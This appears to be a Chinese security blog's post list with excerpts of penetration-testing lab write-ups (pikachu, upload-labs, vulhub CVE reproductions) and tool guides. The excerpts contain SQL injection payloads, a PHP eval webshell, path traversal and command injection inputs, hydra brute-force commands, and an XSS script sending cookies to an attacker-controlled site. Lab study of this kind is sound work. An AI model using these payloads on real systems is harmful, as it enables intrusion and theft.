自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(41)
  • 收藏
  • 关注

原创 数据库常用语句

1.MySQL # 开启外联 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;

2022-05-11 19:45:12 259

原创 upload-labs通关记录

upload-labs通关记录1.Pass-01原理客户端检测,仅仅通过使用JavaScript来拒绝非法文件上传。攻击过程上传一个1.jpg文件,使用burp将.jpg修改为.php# 1.jpg<?php phpinfo();?>​上传成功后,访问图片地址2.Pass-02(MIME验证)原理MIME类型用来设定某种扩展名文件的打开方式,当具有该扩展名的文件被访问时,浏览器会自动使用指定的应用程序来打开。攻击过程上传1.php ,因为

2022-04-16 18:35:27 411

原创 pocsuite使用教程

Pocsuite使用教程1.常用命令# Verify验证模式python cli.py -r pocs/test1.py(poc脚本路径) -u http://127.0.0.1 --verify# 批量验证python cli.py -r pocs/test1.py -f url.txt --verify# 加载文件夹下所有的poc对目标进行测试python cli.py -r pocs/* -u http://127.0.0.1 --verify# 使用多线程python cl

2022-04-16 11:14:13 1536

原创 CVE-2019-8451(Jira未授权SSRF漏洞)

CVE-2019-8451(Jira未授权SSRF漏洞)1.漏洞概述jira的/plugins/servlet/gadgets/makeRequest资源存在ssrf漏洞。2.环境搭建使用docker 进行搭建docker pull cptactionhank/atlassian-jira:7.8.0docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0访问ip:8080进行安装jira,安装过程需

2022-04-09 17:15:15 4734

原创 pikachu-SQL注入

pikachu-SQL注入1.数字型(post)​ 使用burp抓包,并进行联合注入判断字段数爆出数据库名爆出表名爆出字段名爆出用户名和密码2.字符型注入(get)​ 同样使用联合注入但是需要闭合单引号# 搜索框内输入1' order by 3 #1' order by 2 #-1' union select 1,group_concat(schema_name) from information_schema.schemata #-1' union select

2022-03-10 23:46:29 5436

原创 pikachu-FileDownload

pikachu-FileDownload1.Unsafe Filedownload​ 点击球星头像即可下载图片​ 构造地址,下载服务器的/etc/passwdhttp://192.168.1.150/pikachu-labs/vul/unsafedownload/execdownload.php?filename=kb.png# 构造后http://192.168.1.150/pikachu-labs/vul/unsafedownload/execdownload.php?filename=

2022-03-04 17:10:14 1951

原创 pikachu-文件包含

1.File Inclusion(local)​ 正常情况下访问http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_local.php?filename=file1.php&submit=提交​ 尝试访问/etc/passwd (/etc/php.ini 需设Allow_url_include On)http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_local.php?file

2022-03-04 16:55:39 1861

原创 pikachu-RCE

pikachu-RCE1.exec “ping”正常情况下输入Ip地址,可以看到下面有ping命令的结果​ 输入192.168.1.1;ifconfig,可以看到ifconfig命令的结果也显示了出来,以此类推可以伪造更多的命令。2.exec “evel”​ 在输入框里输入phpinfo();可以看到phpinfo()函数的结果显示了出来。...

2022-03-04 16:21:37 214

原创 pikachu-CSRF

pikachu-CSRF1.CSRF(GET)​ 修改用户信息,使用burp抓包,伪造提交的地址# 数据包GET /pikachu-labs/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=15988767673&add=dsfsf&email=kobe%40pikachu.com1&submit=submit# 伪造地址http://192.168.1.150/pikachu-labs/vul/csrf

2022-03-04 16:03:51 2302

原创 CSRF漏洞

CSRF漏洞1.如何测试csrf漏洞对目标站点增删改查的地方进行标记,并观察逻辑,判断请求是否可以伪造# 手工测试 若本次操作中存在csrf token参数,或存在验证码等防御行为,则不存在csrf漏洞。若将数据包中的referer字段去掉,或仅仅删除referer字段的值,重新发送得到服务器的正确受理,那么可认为存在csrf漏洞。2.攻击流程# 受害者登录了目标网站# 攻击者向受害者发送恶意链接# 受害者点击链接, 链接中的js代码执行, 向目标网站发送某个请求# 由于用户已登录,

2022-03-04 09:10:29 716

原创 文件包含漏洞

文件包含漏洞1.漏洞点大多数PHP网站,具有和漏洞相关的文件包含函数以及文件包含函数中存在动态变量,且用户能够控制该变量,这些网站可能存在文件包含漏洞。2.漏洞利用常见的文件包含漏洞的形式为 <?php include("inc/" . $_GET['file']); ?>同目录包含 file=.htaccess目录遍历 ?file=../../../../../../../../../var/lib/locate.db日志注入 ?file=../../../../../.

2022-03-04 09:06:55 2774

原创 暴力破解漏洞

暴力破解漏洞1.漏洞原理暴力破解的产生是由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息。一般来说知道管理员的账户信息,破解的效率会大大增提升。2.破解工具# hydrahydra.exe -l sa -P c:\pass.txt 192.168.1.110 mssql (破解主机sa用户口令)hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql (破解Mysql密码)hydra.exe -l admin

2022-03-02 21:59:45 926

原创 SSRF漏洞

SSRF漏洞1. 原理SSRF即服务器请求伪造,是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法f的内部系统。(正因为请求是服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。而SSRF的形成大多由于服务器提供了从其他服务器应用获取数据的功能,而没有对目标地址做过滤和限制。2.漏洞利用# 对外网、服务器所在的内网、本地进行端口扫描,获取一些服务的banner信息。# 攻击运行在内网或本地的应用程序。# 对内网进行指纹识别,识别企业

2022-02-28 23:57:30 126

原创 文件上传漏洞

文件上传漏洞1.漏洞检测有上传的功能才可能会有相应的漏洞,文件上传漏洞也是一样,检测时需要在各种可以上传文件的功能点进行检测。而程序员在防止上传漏洞时可以分为两种:客户端检测:客户端使用Javascript检测,在文件未上传时,就对文件进行验证。服务器端检测:服务器端脚本一般会检测文件的MIME类型,检测文件扩展名是否合法,甚至会检测文件中是否嵌入恶意代码。2.漏洞利用# 一句话木马<?php @eval($_POST[]);?>文件上传漏洞可以上传一句话木马得到目标网站的

2022-02-28 22:32:30 335

原创 命令行参数

命令行参数1.sys​ sys模块主要用于获取和Python解释器相关的信息,可在Python交互式解释器中先导入sys模块 import sys.通过内置函数dir()查询到模块内定义的所有名称,并以一个字符串列表形式返回sys.argv # 以列表的形式获取运行Python程序的命令行参数import sysdef start(argv): print('程序名',argv[0]) print('第一个参数',argv[1]) print('第二个参数',

2022-02-25 00:12:56 385

原创 XSS平台获取cookie

XSS平台获取cookie1.环境介绍靶场:pikachuXSS平台:BLUE-LOTUS浏览器:火狐浏览器2.流程介绍登录XSS平台,创建获取cookie的脚本var website = "http://网站地址";(function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d

2022-02-19 13:32:27 3618

原创 Joomla 3.4.5 反序列化漏洞

Joomla 3.4.5 反序列化漏洞1.漏洞原理​ 本漏洞根源是PHP5.6.13前的版本在读取存储号的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。2.漏洞环境docker-compose up -d# 启动后访问http://192.168.184.130:8080/​3.漏洞

2021-12-29 21:28:30 2364

原创 httpd.conf配置

1.httpd.conf配置ServerAdmin root@localhost#ServerName www.example.com:80<Directory /> Options FollowSymLinks AllowOverride none# Require all denied CheckSpelling on CheckCaseOnly on</Directory>LoadModule speling_module

2021-12-24 22:37:10 329

原创 Python PIL远程命令执行漏洞(GhostButt)

1.原理Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。PIL内部根据图片头来判断图片类型,如果发现是一个eps文件,则分发给PIL/EpsImagePlugin.py处理。如果操作系统上安装了GhostScript就会因为它的一个沙盒绕过漏洞,导致任意命令执行。2.漏洞环境docker-compose up -d运行后,访问http://192.168.184.130

2021-12-21 21:45:11 1089

原创 Wordpress 4.6任意命令执行漏洞

Wordpress 4.6 任意命令执行漏洞1.漏洞环境docker-compose up -d运行后访问http://192.168.254.202:8080安装wordpress账号我这里重新设置了一下,wordperss2.漏洞复现payloadpayload中run{}里面所有的/用${substr{0}{1}{$spool_directory}}代替payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替构造payloa

2021-12-18 19:56:32 889

原创 thinkphp 2.x 任意代码执行

thinkphp 2.x任意代码执行1.漏洞概述​ ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));​ 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。​ ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。2.环境搭

2021-12-16 09:08:55 1802

原创 Apache HTTPD 多后缀解析漏洞复现

Apache HTTPD 多后缀解析漏洞复现1.原理Apache HTTPD支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。如AddType text/html .htmlAddLanguage zh-CN .cn其给.html后缀增加了media-type,值为text/html; 给.cn后缀增加了语言,值为zh-CN.此时,如果用于请求文件index.cn.html.他将返回一个中文的html页面如果运维人员给.php后缀增加了处理器AddHandler application/

2021-12-15 00:08:57 155

原创 CVE-2017-15715

CVE-2017-157151.Apache HTTPD 换行解析漏洞​ Apache HTTPD是一款HTTP服务器,它可以通过mod_php 来运行PHP网页。其2.4.0~2.4.29版本存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。2.漏洞环境docker-compose up -d# 启动后Apache运行在http://192.168.254.202:80803.漏洞复现​ 上传一个名为1.php的文件,被拦

2021-12-14 00:12:22 2307

原创 sqlmap工具使用

sqlmap工具使用1.参数介绍参数说明-b获取banner-p指定测试参数–proxy代理注入–eval=EVALCODE使用HTTP参数污染-a,all查询所有–hostname主机名–is-dba是否是管理员权限–users枚举所有用户–passwords枚举所有用户的密码–roles枚举有所的用户角色–schema枚举DBMS模式–count枚举所有的条目数–dump转存DBMS

2021-12-07 01:12:11 133

原创 Discuz 3.x 任意文件删除漏洞复现

Discuz!X ≤3.4 任意文件删除漏洞1.漏洞环境执行docker-compose up -d 启动后,访问http://192.168.1.142/install来安装discuz2.漏洞复现访问http://192.168.1.142/robots.txt可见robots.txt是存在的注册用户hahaha在个人设置页面找到自己的formhash带上自己的Cookie、formhash发送如下数据包查看个人设置页面的出生地构造upload.ht

2021-12-06 17:19:02 2211

原创 Discuz 7.x/6.x 全局变量防御绕过导致代码执行

1.漏洞原理​ 由于php5.3 x版本里php.ini的设置request_order默认值为GP,导致Discuz 6.x/7.x全局变量防御绕过漏洞。2.漏洞环境​ 执行docker-compose up -d 启动后,访问http://192.168.254.202:8080/install来安装discuz​ 数据库地址db,数据库名为discuz,数据库账号密码均为root3.漏洞复现安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCA

2021-12-05 17:54:27 2364

原创 XSS漏洞(跨站脚本攻击)

1.原理​ 跨站脚本是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。是由于Web应用程序对用户的输入过滤不足又将输入输出到页面中导致。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会收到影响。2.分类反射型反射型XSS也被称为非持久型XSS,是现在最容易出现的一种XSS漏洞。当用户访问一个带有XSS代码的URL请求时,服务器端接收到数据后处理,然后把带有XSS代码的数据发送到浏览器,浏览器解析这段带有XSS代码的数据后,最终造成XSS漏洞。存储型存储型XSS又被称为持久

2021-12-04 23:08:59 1970

原创 谷歌搜索语法

谷歌搜索语法1.常用语法关键字说明site指定域名intext正文中存在关键字的网页intitle标题中存在关键字的网页info一些基本信息inurlURL存在关键字的网页filetype搜索指定文件类型2.示例# 搜索指定网站的子域名site:xxxx.com# 搜索存在敏感信息的网页intitle:管理登录 filetype:php #查询网页标题中含有"管理登录",并且为php类型的网站

2021-12-03 22:30:03 219

原创 Nmap工具使用

Nmap工具使用1.参数介绍-iL # 从文件中导入目标主机或目标网段--exclude # 后面跟的主机或网段将不在扫描范围内--excludefile # 导入文件中的主机或网段将不在扫描范围内-sL # List Scan,仅列举指定目标的IP,不进行主机发现-sn # Ping Scan,只进行主机发现,不进行端口扫描-Pn # 将所有指定的主机视为已开启,跳过主

2021-11-24 23:18:20 152

原创 搭建vulhub环境(Ubuntu 20.04.3)

搭建vulhub环境(Ubuntu 20.04.3)1.安装dockerapt install docker.iocurl -sSL https://get.daocloud.io/daotools/set_mirror.sh | sh -s http://f1361db2.m.daocloud.io //安装docker加速器# 安装docker-composeapt install python3-pip #安装pippip install docker-compose安装完成后,执

2021-11-24 15:16:14 1942

原创 Linux配置软件源

Linux配置软件源1.Ubuntu (阿里源)vim /etc/apt/source.listdeb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiversedeb http://mirrors.aliyun.com/ubuntu/ bionic-security main restricted universe multiversedeb http://mirrors.aliyun.com/ubu

2021-11-23 16:08:58 1170

原创 pikachu靶场-XSS

pikachu靶场-XSS1.反射型xss测试输入<>'"xxxx //测试关键字是否有过滤#网页源代码<p class="xssr_title">Which NBA player do you like?</p><form method="get"> <input class="xssr_in" type="text" maxlength="20" name="message" /> <input

2021-11-21 21:42:21 916

原创 fuzz绕waf

fuzz绕waf(SQL注入)1.fuzz.pyimport requestsimport sysfuzz_zs = ['/*', '*/', '/*!', '/**/', '?', '/', '*', '=', '`', '!', '%', '.', '-', '+']fuzz_sz = ['']fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j","%0k","%0l","%0m","

2021-11-17 23:30:16 2020

原创 文件包含漏洞

文件包含漏洞原理解析#PHP包含(PHP中提供了四个文件包含的函数)require 找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本include 找不到被包含的文件时只会产生警告(E_WARNING),脚本将继续执行include_once 此语句和include()语句类似,如果该文件中的代码已经被包含,则不会再次包含。require_once 此语句和require()语句类似,如果该文件中的代码已经被包含,则不会再次包含。本地文件包含#ind

2021-11-01 23:42:44 116

原创 Sql注入漏洞常用语法

SQL注入常用语法letf(a,b)函数,left(database(),1)='s' # 从左侧截取a的前b位,正确返回1,错误返回0regexp函数,select user() regexp 'r' # regexp匹配user()的正则表达式like函数,select user() like 'ro%' # like模糊匹配substr(a,b,c),select substr() #从b开始截取a,c个字符串长度ascii() # 将某个字符转为ascii值chr('数字'),

2021-10-04 23:37:33 1380

原创 scrapy-pipline

piplineImage Pipline(爬取图片)# settings.pyIMAGES_STORE = './images'# piplines.pyfrom scrapy import Requestfrom scrapy.exceptions import DropItemfrom scrapy.piplines.images import ImagesPiplineclass ImagePipline(ImagesPipline): # 接收spider生成的item,取出

2021-09-12 23:21:32 99

原创 scrapy-settings.py

settings.pysettings.pyBOT_NAME ='TouPIc' # 项目名SPIDER_MOULES = ['TouPic.spiders'] # 爬虫的位置NEWSPIDER_MODULE= 'TouPic.spiders' #新建一个爬虫会在的位置USER_AGENT= '' # 浏览器的表示ROBOTSTST_OBEY= False # 君子协议CONCURRENT_REQUESTS = 32 #并发请求DOWNLOAD_DELAY = 3 #下载延迟# DO

2021-09-12 22:27:52 101

原创 cookie劫持

pikachu靶场—cookie劫持一.劫持的原理​ 利用XSS漏洞,对存在漏洞的位置进行测试,并写出payload。​ 将构造好的链接发送给用户,用户点击后就会将自己的cookie发送到攻击者提前布好的网站。​ 这次使用的是pikachu靶场,里面就存在着XSS相关的漏洞。二、劫持的过程环境说明服务器: windows 7(pikachu靶场) IP:192.168.254.136用户: windows 10 IP:192.

2021-08-15 22:43:04 1182

原创 MS08_067漏洞复现

MS08_067漏洞复现MS08_067漏洞也是在445端口上被攻击者利用,MS17_010利用的是445端口上的网络共享和远程文件的服务,而这次的MS08_067利用的是在远程调用过程中,函数出现的逻辑性错误,从而造成缓冲区溢出。1.漏洞复现1.1 复现环境靶机:windows xp sp2 IP:192.168.1.133攻击机:kali-linux-2020.2 IP:192.168.1.1311.2 复现流程启动msfconsole...

2021-07-22 10:18:12 5485 2

原创 MS17 -010漏洞复现

MS17 -0101.漏洞介绍永恒之蓝爆发于2017年4月14日,利用windows系统的SMB协议来获取系统的最高权限,从而控制被入侵的计算机。目前已知受影响的Windows版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。2.漏洞浮现2.1 环境搭

2021-07-15 12:55:07 302

SRC渗透报告整理.rar

SRC渗透报告整理.rar

2022-10-15

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除